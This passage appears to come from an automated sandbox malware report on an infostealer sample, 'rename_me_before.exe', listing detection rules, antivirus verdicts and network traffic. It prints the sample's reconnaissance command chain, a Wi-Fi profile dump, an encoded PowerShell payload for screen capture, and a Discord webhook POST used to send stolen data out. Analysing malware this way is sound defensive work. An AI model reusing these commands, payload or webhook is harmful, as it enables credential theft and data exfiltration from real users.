QALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
            Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7244, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup administrators, ProcessId: 7804, ProcessName: net.exe
            Sigma detected: Dynamic CSharp Compile Artefact
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1668, TargetFilename: C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline
            Sigma detected: Local Accounts Discovery
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7244, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 7700, ProcessName: net.exe
            Sigma detected: Net.exe Execution
            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7244, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 7700, ProcessName: net.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Get-Clipboard, CommandLine: powershell.exe Get-Clipboard, CommandLine|base64offset|contains: ~Xn, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2588, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Get-Clipboard, ProcessId: 7176, ProcessName: powershell.exe
            Sigma detected: SC.EXE Query Execution
            Source: Process startedAuthor: frack113: Data: Command: sc query type= service state= all, CommandLine: sc query type= service state= all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7244, ParentProcessName: cmd.exe, ProcessCommandLine: sc query type= service state= all, ProcessId: 8036, ProcessName: sc.exe
            Sigma detected: Suspicious Execution of Hostname
            Source: Process startedAuthor: frack113: Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7244, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 7544, ProcessName: HOSTNAME.EXE
            Sigma detected: Suspicious Network Command
            Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\rename_me_before.exe", ParentImage: C:\Users\user\Desktop\rename_me_before.exe, ParentProcessId: 3512, ParentProcessName: rename_me_before.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administ
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7624, ProcessName: svchost.exe

            Data Obfuscation

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

            Stealing of Sensitive Information

            barindex
            Sigma detected: Capture Wi-Fi password
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\rename_me_before.exe", ParentImage: C:\Users\user\Desktop\rename_me_before.exe, ParentProcessId: 3512, ParentProcessName: rename_me_before.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", ProcessId: 7256, ProcessName: cmd.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: rename_me_before.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeAvira: detection malicious, Label: TR/Redcap.woxyt
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeReversingLabs: Detection: 57%
            Multi AV Scanner detection for submitted file
            Source: rename_me_before.exeVirustotal: Detection: 67%Perma Link
            Source: rename_me_before.exeReversingLabs: Detection: 50%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.5% probability

            Phishing

            barindex
            Overwrites the password of the administrator account
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: rename_me_before.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.pdb source: powershell.exe, 00000045.00000002.1826414031.000001DBC0644000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, _uuid.pyd.0.dr
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.pdbhP source: powershell.exe, 00000045.00000002.1826414031.000001DBC0644000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \ia.pdbc source: powershell.exe, 00000045.00000002.1848424397.000001DBD74B3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: rename_me_before.exe, 00000000.00000003.1659342426.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, VCRUNTIME140.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: rename_me_before.exe, 00000000.00000003.1659342426.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, VCRUNTIME140.dll.0.dr
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981233285.000001B17FDC0000.00000002.00000001.01000000.00000006.sdmp

            Spreading

            barindex
            Performs a network lookup / discovery via ARP
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6404E79B0
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404E85A0 FindFirstFileExW,FindClose,0_2_00007FF6404E85A0
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF640500B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF640500B84
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404E85A0 FindFirstFileExW,FindClose,1_2_00007FF6404E85A0
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6404E79B0
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF640500B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF640500B84
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior

            Networking

            barindex
            Uses netstat to query active network connections and open ports
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
            Source: unknownDNS query: name: ip-api.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /getServer HTTP/1.1Host: api.gofile.ioAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.9.5
            Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.9.5
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: global trafficDNS traffic detected: DNS query: canary.discord.com
            Source: global trafficDNS traffic detected: DNS query: api.gofile.io
            Source: global trafficDNS traffic detected: DNS query: store1.gofile.io
            Source: unknownHTTP traffic detected: POST /api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B2-50jsFyHabL0Uos8mtD0ZVFUQNS HTTP/1.1Host: canary.discord.comContent-Type: application/jsonAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.9.5Content-Length: 1381
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Wed, 01 Jan 2025 01:53:24 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type, AuthorizationAccess-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEADAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: cross-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
            Source: rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
            Source: rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A29F000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 